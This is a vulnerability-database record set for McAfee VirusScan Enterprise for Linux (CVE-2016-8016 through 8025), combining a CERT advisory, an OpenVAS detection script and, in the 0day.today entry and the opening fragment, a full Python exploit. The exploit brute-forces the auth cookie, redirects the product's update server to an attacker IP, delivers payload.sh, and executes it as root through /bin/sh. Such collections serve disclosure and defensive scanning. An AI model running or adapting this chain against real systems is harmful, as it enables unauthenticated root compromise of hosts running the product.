\ncookie = crack_cookie() \nauth_cookie = {\"nailsSessionId\": cookie} \n \n# Start our update server locally \nsrv = start_update_server() \n \n# Force target to use our update server \nupdate_update_server(auth_cookie) \n \n# Make target download an update from us \ndownload_update(auth_cookie) \n \n# Block until the target downloads our payload, \npayload_in_place.wait() \n \n# Shutdown our update server \nsrv.shutdown() \n \n# Execute /bin/sh -(?) catalog.z \nexec_catalogz(auth_cookie) \n \n`\n", "viewCount": 38, "hash": "3e2948b5d852c5d5544c7f875083bf93fd501f619ae4c002720fcad99792fcfc", "sourceHref": "https://packetstormsecurity.com/files/download/140147/mvsel-exec.txt", "title": "McAfee Virus Scan Enterprise For Linux Remote Code Execution", "modified": "2016-12-14T00:00:00", "history": [], "href": "https://packetstormsecurity.com/files/140147/McAfee-Virus-Scan-Enterprise-For-Linux-Remote-Code-Execution.html", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d256ff4c7eb269f85319842163871350", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "d618bfb4271cabd52089f9b04433ae84", "key": "href"}, {"hash": "1ac4c362d435a40acf97fe0a9efae1f3", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "1ac4c362d435a40acf97fe0a9efae1f3", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "0e7189ecca28c68f6d5b872258eabecb", "key": "reporter"}, {"hash": "925c8db643322528cbb94bf19d260f76", "key": "sourceData"}, {"hash": "2ec2fa6bb9926d78d7273fcc822badbb", "key": "sourceHref"}, {"hash": "c6e49b792783248f2f362dad295169f7", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}], "objectVersion": "1.2", "edition": 1, "description": "", "bulletinFamily": "exploit", "reporter": "Andrew Fasano", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-12-14T02:03:47"}
{"cert": [{"lastseen": "2019-10-09T19:49:01", "bulletinFamily": "info", "description": "### Overview \n\nMcAfee VirusScan for Linux contains multiple vulnerabilities.\n\n### Description \n\nMcAfee VirusScan for Linux version 2.0.3 and prior is vulnerable to the following:\n\n[**CWE-200**](<http://cwe.mitre.org/data/definitions/200.html>)**: Information Exposure - **CVE-2016-8016 \n \nMultiple pages within the web interface utilize a `tplt` parameter. An authenticated remote attacker can manipulate the value of the `tlpt` parameter to produce error messages that can reveal the existence of unauthorized files on the system, if the attacker can guess the filename. \n \n[**CWE-75**](<http://cwe.mitre.org/data/definitions/75.html>)**: Failure to Sanitize Special Elements into a Different Plane (Special Element Injection) - **CVE-2016-8017 \n \nAn authenticated remote attacker may be able to place special text elements such as \"__REPLACE_THIS__\" or \"[%\" and \"%]\" with special meaning to the software parser into user input such that the special element may be injected into system processes such as log readers. When the log is read, the software will read these special elements as commands and take appropriate actions. An attacker may be able to use this vulnerability to remotely read files on the webserver as the nails user. \n \n[**CWE-352**](<http://cwe.mitre.org/data/definitions/352.html>)**: Cross-Site Request Forgery (CSRF) - **CVE-2016-8018 \n \nThe web interface does not make use of anti-CSRF tokens and therefore may be vulnerable to CSRF. \n \n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVE-2016-8019 \n \nMultiple pages within the web interface utilize a tplt parameter. When _tplt _is set to _NailsConfig.html _or _MonitorHost.html_, parameters _info:7 _and _info:5 _contain user input and are not properly verified. An unauthenticated remote attacker may spoof the values of info:7 and info:5 to execute arbitrary JavaScript code. \n \n[**CWE-94**](<http://cwe.mitre.org/data/definitions/94.html>)**: Improper Control of Generation of Code ('Code Injection') - **CVE-2016-8020 \n \nOn the final page of the system scan form, the _nailsd.profile.ODS_9.scannerPath _variable contains the path that the system will execute to run the scan. An authenticated remote user may manipulate this value in the HTTP request to execute an arbitrary binary as the root user. \n \n[**CWE-347**](<http://cwe.mitre.org/data/definitions/347.html>)**: Improper Verification of Cryptographic Signature - **CVE-2016-8021 \n \nThe web interface does not properly verify the cryptographic signature of the file, allowing a remote attacker to spoof the update server and execute arbitrary code. \n \n[**CWE-290**](<http://cwe.mitre.org/data/definitions/290.html>)**: Authentication Bypass by Spoofing - **CVE-2016-8022 \n \nThe web interface uses an authentication cookie that embeds the users' IP address into the cookie. A remote attacker may be able to manipulate the cookie in such a way that the service believes the cookie was sent from the victim's IP address. \n \n[**CWE-302**](<http://cwe.mitre.org/data/definitions/302.html>)**: Authentication Bypass by Assumed-Immutable Data - **CVE-2016-8023 \n \nThe web interface uses an authentication cookie that embeds the server start time as the DATE parameter. A remote attacker may be able to brute-force guess the server start time stored in DATE, which may lead to authentication bypass. \n \n[**CWE-113**](<http://cwe.mitre.org/data/definitions/113.html>)**: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') - **CVE-2016-8024 \n \nA remote attacker may be able to spoof an HTTP GET request for a CSV export of the system logs with newlines encoded in the URL in such a manner that arbitrary HTTP headers may be spoofed in the server response. \n \n[**CWE-89**](<http://cwe.mitre.org/data/definitions/89.html>)**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - **CVE-2016-8025 \n \nThe web interface's CSV log export functionality encodes a SQL command into the URL. A remote attacker may be able to include arbitrary SQL commands URL-encoded in an HTTP request, thereby executing SQL commands on the backend SQLite database. This database does not contain authentication information, only data about settings and previously scanned files. \n \nFor more information, please see [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>) and the researcher's [blog post](<https://nation.state.actor/mcafee.html>). \n \nThe CVSS score below is based on CVE-2016-8023. For further CVSS scoring and analysis, please see McAfee Security Bulletin SB10181. \n \nPreviously this Vulnerability Note also contained one vulnerability for the Windows platform. This issue was republished as its own [VU#535111](<http://www.kb.cert.org/vuls/id/535111>) to prevent product confusion. \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to read limited subsets of files and logs on the system, execute arbitrary JavaScript code in the web interface, or execute arbitrary code on the system. \n \n--- \n \n### Solution \n\n**Upgrade to a new product** \n \nMcAfee has discontinued the VirusScan for Linux product in favor of the new McAfee [Endpoint Security](<http://www.mcafee.com/us/products/endpoint-protection/endpoint-security.aspx>) product, which addresses these vulnerabilities. McAfee recommends that affected users upgrade to Endpoint Security version 10.2 or later as soon as possible. The upgrade is available free of charge to existing users with current licenses. \n \n--- \n \n### Vendor Information\n\n245327\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ McAfee\n\nNotified: December 05, 2016 Updated: December 12, 2016 \n\n**Statement Date: December 12, 2016**\n\n### Status\n\n__ Affected\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nMcAfee has released [Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>) for this issue.\n\n### Vendor References\n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>)\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * [https://kc.mcafee.com/corporate/index?page=content&id=SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>)\n * <https://nation.state.actor/mcafee.html>\n\n### Acknowledgements\n\nThanks to Andrew Fasano for reporting these vulnerabilities to us.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-8016, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8016>) [CVE-2016-8017, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8017>) [CVE-2016-8018, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8018>) [CVE-2016-8019, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8019>) [CVE-2016-8020, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8020>) [CVE-2016-8021, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8021>) [CVE-2016-8022, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8022>) [CVE-2016-8023, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8023>) [CVE-2016-8024, ](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8024>) [CVE-2016-8025](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8025>) \n---|--- \n**Date Public:** | 2016-12-09 \n**Date First Published:** | 2016-12-12 \n**Date Last Updated: ** | 2016-12-13 20:37 UTC \n**Document Revision: ** | 64 \n", "modified": "2016-12-13T20:37:00", "published": "2016-12-12T00:00:00", "id": "VU:245327", "href": "https://www.kb.cert.org/vuls/id/245327", "type": "cert", "title": "McAfee VirusScan for Linux contains multiple vulnerabilities", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-15T21:23:18", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://0day.today/exploit/description/26519", "id": "1337DAY-ID-26519", "title": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution Exploit", "type": "zdt", "sourceData": "'''\r\nSource: https://nation.state.actor/mcafee.html\r\n \r\nVulnerabilities\r\n \r\nCVE-2016-8016: Remote Unauthenticated File Existence Test\r\nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints)\r\nCVE-2016-8018: No Cross-Site Request Forgery Tokens\r\nCVE-2016-8019: Cross Site Scripting\r\nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation\r\nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location\r\nCVE-2016-8022: Remote Use of Authentication Tokens\r\nCVE-2016-8023: Brute Force Authentication Tokens\r\nCVE-2016-8024: HTTP Response Splitting\r\nCVE-2016-8025: Authenticated SQL Injection\r\nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root.\r\n'''\r\n#!/bin/python3\r\nimport time\r\nimport requests\r\nimport os\r\nimport sys\r\nimport re\r\nimport threading\r\nimport subprocess\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom socketserver import ThreadingMixIn\r\n \r\n# Per-target configuration\r\ntarget_domain=\"https://10.0.1.130\" # https://target_ip\r\nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to\r\nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for\r\nupdate_server_port = 8080 # Port update server listens on\r\ndelay_seconds = 10 # How long should the server take to serve the update\r\ntarget_port = 55443 # Port to target\r\n \r\n# Put payload script in payload.sh\r\n \r\n# Initialization\r\npayload_in_place = threading.Event()\r\nrequests.packages.urllib3.disable_warnings()\r\nwith open(\"payload.sh\", \"r\") as f:\r\n payload = f.read()\r\n \r\ndef pprint(inp, flag=False):\r\n pad = \"#\"\r\n if flag:\r\n pad = \"*\"\r\n print(\"\\n\" + pad+ \" \" + inp)\r\n \r\n \r\ndef crack_cookie():\r\n pprint(\"Cracking Cookie\")\r\n \r\n # A page that requires authentication\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\"\r\n \r\n # Start at the current time + 100 in case of recent login with clock skew\r\n date_val = int(time.time()+100)\r\n cookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20\r\n \r\n # Make requests, print after every 600\r\n while True:\r\n cookie = cookie_fmt % date_val\r\n req_cookie = {\"nailsSessionId\": cookie}\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n \r\n if \"Set-Cookie\" in r.headers:\r\n valid_cookie = cookie\r\n timestamp = cookie.split(\"/\")[3].split(\"-\")[0]\r\n break\r\n \r\n elif date_val % 600 == 0:\r\n print(\"Now trying %s\" % time.asctime(time.localtime(date_val)))\r\n \r\n date_val -= 1\r\n \r\n pprint(\"Cookie Cracked: \" + timestamp, True)\r\n return valid_cookie\r\n \r\n \r\ndef update_update_server(auth_cookie):\r\n pprint(\"Updating update server\")\r\n \r\n # Replace McAfeeHttp update server with attacker local_ip:update_server_port\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\\r\n \"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\\r\n \"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\\r\n \"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\\r\n \"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\\r\n \"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\\r\n \"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\\r\n \"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\\r\n + \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\\r\n \"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\\r\n \"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\\r\n \"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\\r\n \"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\\r\n \"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\\r\n \"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\\r\n \"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\\r\n \"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\\r\n \"posProperty=fallback&useOfProxy=on\"\r\n \r\n r = requests.get(url, cookies=auth_cookie, verify=False)\r\n r.raise_for_status()\r\n pprint(\"Updated update server\", True)\r\n \r\ndef download_update(req_cookie):\r\n pprint(\"Requesting target download payload\")\r\n \r\n # Send request to make target download payload\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n \r\n updateName = \"update_%d\" % int(time.time())\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\\r\n \"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\\r\n \"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\\r\n \"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\\r\n \"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\\r\n \"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\\r\n \"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\\r\n \"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName)\r\n \r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n \r\n pprint(\"Payload download requested\", 1)\r\n \r\n \r\ndef exec_catalogz(req_cookie):\r\n pprint(\"Making target execute payload\")\r\n \r\n #### Get commit_id and ODS_name\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\\r\n \".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\\r\n \"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\\r\n \"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\\r\n \",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\\r\n \"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\"\r\n \r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n \r\n regex = re.search(\"\\|digest=(.+?)\\|\", r.text)\r\n if not regex:\r\n print(\"\\nERROR: Could not get commit_id when generating evil scan\\n\")\r\n return False\r\n \r\n commit_id = regex.groups(1)[0]\r\n \r\n # Send request to start evil scan\r\n payload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\"\r\n binary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x\r\n \r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n \r\n ODS_name = \"ODS_1\" # This may need to be increased if the name already exists\r\n scan_name = \"scan_%s\" % str(int(time.time()))\r\n \r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\\r\n \"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\\r\n \"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\\r\n \"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\\r\n \".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\\r\n \"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\\r\n \"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\\r\n \"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\\r\n \"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\\r\n \"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\\r\n \"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\\r\n \"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\\r\n \"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\\r\n \"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\\r\n \"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\\r\n \"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\\r\n \"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\\r\n \".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\\r\n \"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\\r\n \"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\\r\n \".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\\r\n \"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\\r\n \"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\\r\n \"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\\r\n \"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\\r\n \"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\\r\n \"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\\r\n \"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\\r\n \"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\\r\n \"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path)\r\n \r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n \r\n pprint(\"Payload executed\", 1)\r\n \r\ndef start_update_server():\r\n \r\n class RequestHandler(BaseHTTPRequestHandler):\r\n def do_HEAD(s):\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n \r\n def do_GET(s):\r\n if s.path == \"/catalog.z\":\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n s.wfile.write(bytes(payload, \"utf-8\"))\r\n \r\n pprint(\"Payload placed\", 1)\r\n \r\n payload_in_place.set()\r\n \r\n # Die after sending payload so we send an incomplete response\r\n raise KillServer\r\n \r\n else: # Assume all other requests are for SiteStat - Always increasing version\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/xml\")\r\n s.end_headers()\r\n s.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\\r\n \"\"\"<SiteStatus Status=\"Enabled\" CatalogVersion=\"2%d\">\"\"\" \\\r\n \"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\"))\r\n \r\n # Throwing KillServer will shutdown the server ungracefully\r\n class KillServer(Exception):\r\n def __str__(self):\r\n return \"Kill Server (not an error)\"\r\n \r\n # ThreadingMixIn plus support for KillServer exceptions\r\n class AbortableThreadingMixIn(ThreadingMixIn):\r\n def process_request_thread(self, request, client_address):\r\n try:\r\n self.finish_request(request, client_address)\r\n self.shutdown_request(request)\r\n except KillServer:\r\n pprint(\"Killing update server dirtily\")\r\n self.shutdown_request(request)\r\n self.shutdown() # Only if we want to shutdown\r\n except:\r\n self.handle_error(request, client_address)\r\n self.shutdown_request(request)\r\n \r\n \r\n class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):\r\n pass\r\n \r\n pprint(\"Launching update server\")\r\n \r\n srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)\r\n threading.Thread(target=srv.serve_forever).start()\r\n \r\n pprint(\"Update server started\", 1)\r\n return srv\r\n \r\n \r\n####################################################################################\r\n####################################################################################\r\n \r\npprint(\"Attacking %s\" % target_domain, 1)\r\n \r\n# Crack the auth cookie\r\ncookie = crack_cookie()\r\nauth_cookie = {\"nailsSessionId\": cookie}\r\n \r\n# Start our update server locally\r\nsrv = start_update_server()\r\n \r\n# Force target to use our update server\r\nupdate_update_server(auth_cookie)\r\n \r\n# Make target download an update from us\r\ndownload_update(auth_cookie)\r\n \r\n# Block until the target downloads our payload,\r\npayload_in_place.wait()\r\n \r\n# Shutdown our update server\r\nsrv.shutdown()\r\n \r\n# Execute /bin/sh -(?) catalog.z\r\nexec_catalogz(auth_cookie)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26519"}], "openvas": [{"lastseen": "2019-05-29T18:35:27", "bulletinFamily": "scanner", "description": "McAfee VirusScan Enterprise for Linux is prone to multiple\nvulnerabilities.", "modified": "2018-10-29T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310106470", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106470", "title": "McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mcafee_virusscan_enterprise_lin_mult_vuln.nasl 12149 2018-10-29 10:48:30Z asteins $\n#\n# McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:mcafee:virusscan_enterprise_for_linux';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106470\");\n script_version(\"$Revision: 12149 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 11:48:30 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 11:28:02 +0700 (Wed, 14 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-8016\", \"CVE-2016-8017\", \"CVE-2016-8018\", \"CVE-2016-8019\", \"CVE-2016-8020\",\n\"CVE-2016-8021\", \"CVE-2016-8022\", \"CVE-2016-8023\", \"CVE-2016-8024\", \"CVE-2016-8025\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_virusscan_enterprise_detect_lin.nasl\");\n script_mandatory_keys(\"mcafee/virusscan_enterprise_linux/installed\");\n\n script_tag(name:\"summary\", value:\"McAfee VirusScan Enterprise for Linux is prone to multiple\nvulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"McAfee VirusScan Enterprise for Linux is prone to multiple vulnerabilities:\n\n - Remote Unauthenticated File Existence Test (CVE-2016-8016)\n\n - Remote Unauthenticated File Read (CVE-2016-8017)\n\n - No Cross-Site Request Forgery Tokens (CVE-2016-8018)\n\n - Cross Site Scripting (CVE-2016-8019)\n\n - Authenticated Remote Code Execution and Privilege Escalation (CVE-2016-8020)\n\n - Web Interface Allows Arbitrary File Write to Known Location (CVE-2016-8021)\n\n - Remote Use of Authentication 